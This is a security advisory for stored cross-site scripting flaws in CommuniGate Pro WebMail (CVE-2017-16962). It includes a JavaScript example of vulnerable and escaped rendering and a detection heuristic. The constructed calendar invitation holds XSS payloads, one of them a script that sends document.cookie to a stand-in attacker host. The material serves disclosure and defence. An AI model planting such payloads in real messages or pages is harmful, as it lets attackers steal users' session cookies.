PT-2017-14665 · Stalker · Communigate Pro
Boumediene Kaddour
·
Published
2017-11-27
·
Updated
2017-12-12
·
CVE-2017-16962
CVSS v3.1
6.1
Medium
| Vector | AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N |
Name of the Vulnerable Software and Affected Versions
CommuniGate Pro versions prior to 6.2.1
Description
Multiple stored cross-site scripting (XSS) vulnerabilities exist in the WebMail components of CommuniGate Pro, specifically in Crystal, Pronto and Pronto4. Attacker-supplied strings are stored by the server and later rendered in the WebMail interface without adequate output encoding, so a user who opens the affected item executes the injected script in the WebMail context. The injection points include:
- the location or details field of a Google Calendar invitation,
- a crafted Outlook.com calendar invitation,
- e-mail granting access to a directory with JavaScript in its name,
- JavaScript in a note name,
- JavaScript in a task name,
- HTML e-mail that is mishandled in the Inbox component.
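The common thread in the list above is that text an outside party controls (a calendar invitation's location and details, a shared directory's name, a note or task name) is inserted into the WebMail page as markup. The following is an added example, not CommuniGate Pro code, showing the vulnerable rendering pattern beside the hardened one, plus a heuristic check a mail administrator could run over invitation fields. The iCalendar invitation and the item names are constructed for the example; the single-line property extraction is deliberately minimal (no line folding or property parameters) and the `containsActiveMarkup` pattern is a triage heuristic, not a sanitizer.

```javascript
// Constructed iCalendar invitation: LOCATION and DESCRIPTION carry the kind of
// payload the advisory describes for calendar invitations (RFC 5545 field names).
const CONSTRUCTED_INVITE = [
  'BEGIN:VCALENDAR',
  'BEGIN:VEVENT',
  'SUMMARY:Quarterly review',
  'LOCATION:Room 4 <img src=x onerror=alert(document.cookie)>',
  'DESCRIPTION:Agenda attached<script>fetch("https://attacker.example/?c="+document.cookie)</script>',
  'END:VEVENT',
  'END:VCALENDAR',
].join('\r\n');

// Minimal property extraction: first line starting with "NAME:".
// (Assumption for the example: no folded lines, no property parameters.)
function getProperty(ics, name) {
  const prefix = name + ':';
  for (const line of ics.split(/\r?\n/)) {
    if (line.startsWith(prefix)) return line.slice(prefix.length);
  }
  return '';
}

// Entity-encode the five characters that matter in HTML text and
// double-quoted attribute contexts.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (ch) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[ch]);
}

// Vulnerable pattern: untrusted field text concatenated straight into markup.
// Anything that looks like a tag or event handler survives into the DOM.
function renderInviteUnsafe(ics) {
  return '<div class="location">' + getProperty(ics, 'LOCATION') + '</div>' +
         '<div class="details">' + getProperty(ics, 'DESCRIPTION') + '</div>';
}

// Hardened pattern: every untrusted value is encoded for the context it lands in.
function renderInviteSafe(ics) {
  return '<div class="location">' + escapeHtml(getProperty(ics, 'LOCATION')) + '</div>' +
         '<div class="details">' + escapeHtml(getProperty(ics, 'DESCRIPTION')) + '</div>';
}

// The same rule applies to directory, note and task names: the name is data,
// so it is encoded both as attribute value and as text content.
function renderItemName(name) {
  return '<li title="' + escapeHtml(name) + '">' + escapeHtml(name) + '</li>';
}

// Triage heuristic for a gateway or log review: flag fields that carry a tag,
// an inline event handler, or a javascript: URL. Not a sanitizer.
const MARKUP_RE = /<\s*\/?\s*[a-z!][^>]*>|\bon[a-z]+\s*=|javascript:/i;
function containsActiveMarkup(s) {
  return MARKUP_RE.test(String(s));
}

// Scan the invitation fields that the advisory lists as injection points.
function flagInviteFields(ics) {
  return ['SUMMARY', 'LOCATION', 'DESCRIPTION']
    .filter((name) => containsActiveMarkup(getProperty(ics, name)));
}
```

In an actual browser client the equivalent of `renderInviteSafe` is to build the element and assign the field via `textContent` or `setAttribute` rather than `innerHTML`; string-based encoding is shown here so the example runs without a DOM.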
Recommendations
Update to CommuniGate Pro 6.2.1 or later. Until the update is applied, temporary workarounds are to restrict access to the WebMail components (Crystal, Pronto, Pronto4) and to disable handling of HTML e-mail in the Inbox component. Note that the injected strings (calendar invitation fields, the directory name in a sharing e-mail, note and task names) are chosen by the attacker and delivered to the victim, so advising users not to put JavaScript in their own item names does not mitigate the issue; exploitation requires only that the victim open the crafted item in WebMail (CVSS UI:R).
Tags: Exploit · Fix · XSS
Affected products: Communigate Pro